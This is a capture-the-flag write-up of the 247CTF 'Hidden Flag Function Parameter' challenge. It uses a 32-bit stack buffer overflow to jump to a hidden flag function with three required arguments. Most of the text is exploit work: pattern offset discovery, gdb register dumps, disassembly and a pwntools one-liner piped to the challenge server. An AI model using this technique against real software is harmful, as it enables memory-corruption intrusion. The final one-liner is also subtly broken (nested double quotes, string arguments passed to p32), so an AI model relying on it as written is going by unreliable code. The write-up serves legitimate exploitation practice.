Hidden Flag Function Parameter (pwn)

PUBLISHED ON 22/03/2020 — EDITED ON 01/04/2020 — 247CTF, INFOSEC

Intro

This is my write-up of a Pwnable challenge Hidden Flag Function Parameter on the CTF site 247CTF.com.

Instructions

Can you control this applications flow to gain access to the hidden flag function with the correct parameters?

Howto

This one is very similar to Hidden Flag Function, but as we can see in the instructions, we have to also pass the right parameters to get the flag.

I found a lot of good stuff here.

kali@kali:~$ checksec hidden_flag_function_with_args
[*] '/home/kali/hidden_flag_function_with_args'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

We can see that we have 32bit little endian binary with NX enabled.

Lets create a discrete pattern:

kali@kali:~$ msf-pattern_create -l 300
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9

Run the binary with gdb (I recommend you to install gef) and paste the pattern obtained in previous step in the input:

kali@kali:~$ gdb -q ./hidden_flag_function_with_args
GEF for linux ready, type `gef' to start, `gef config' to configure
75 commands loaded for GDB 9.1 using Python engine 3.8
[*] 5 commands could not be loaded, run `gef missing` to know why.
Reading symbols from ./hidden_flag_function_with_args...
(No debugging symbols found in ./hidden_flag_function_with_args)
gef➤  r
Starting program: /home/kali/hidden_flag_function_with_args
Sorry, no flag here!
You can ask for one though:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9

Program received signal SIGSEGV, Segmentation fault.
0x37654136 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax   : 0x1
$ebx   : 0x41346541 ("Ae4A"?)
$ecx   : 0x0
$edx   : 0xf7fb601c  →  0x00000000
$esp   : 0xffffd4c0  →  "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]"
$ebp   : 0x65413565 ("e5Ae"?)
$esi   : 0xf7fb4000  →  0x001d6d6c
$edi   : 0xf7fb4000  →  0x001d6d6c
$eip   : 0x37654136 ("6Ae7"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd4c0│+0x0000: "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]"	 ← $esp
0xffffd4c4│+0x0004: "e9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5[...]"
0xffffd4c8│+0x0008: "0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A[...]"
0xffffd4cc│+0x000c: "Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag[...]"
0xffffd4d0│+0x0010: "f3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9[...]"
0xffffd4d4│+0x0014: "4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0A[...]"
0xffffd4d8│+0x0018: "Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah[...]"
0xffffd4dc│+0x001c: "f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x37654136
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "hidden_flag_fun", stopped 0x37654136 in ?? (), reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

The program breaks at 0x37654136, so we use msf-pattern_offset, to calculate the offset:

kali@kali:~$ msf-pattern_offset -q 0x37654136
[*] Exact match at offset 140

Now lets check the objdump of the binary, we are searching for cmp instructions, as we know that some parameter conditions have to be met:

kali@kali:~$ objdump -drwC -Mintel -d hidden_flag_function_with_args
...
08048576 <flag>:
 8048576:	55                   	push   ebp
 8048577:	89 e5                	mov    ebp,esp
 8048579:	53                   	push   ebx
 804857a:	81 ec 94 00 00 00    	sub    esp,0x94
 8048580:	e8 2b ff ff ff       	call   80484b0 <__x86.get_pc_thunk.bx>
 8048585:	81 c3 7b 1a 00 00    	add    ebx,0x1a7b
 804858b:	81 7d 08 37 13 00 00 	cmp    DWORD PTR [ebp+0x8],0x1337
 8048592:	75 63                	jne    80485f7 <flag+0x81>
 8048594:	81 7d 0c 47 02 00 00 	cmp    DWORD PTR [ebp+0xc],0x247
 804859b:	75 5a                	jne    80485f7 <flag+0x81>
 804859d:	81 7d 10 78 56 34 12 	cmp    DWORD PTR [ebp+0x10],0x12345678
 80485a4:	75 51                	jne    80485f7 <flag+0x81>
...

So the parameter values need to be set to: 0x1337, 0x247 and 0x12345678.

kali@kali:~$ python -c "from pwn import *; print 'a' * 140 + p32("0x08048576")+'P'*4+p32("0x1337")+p32("0x247")+p32("0x12345678")" | nc a1b6b58043ec4527.247ctf.com 50284
Sorry, no flag here!
You can ask for one though:
How did you get here?
Have a flag!
247CTF{xxxx}

See Also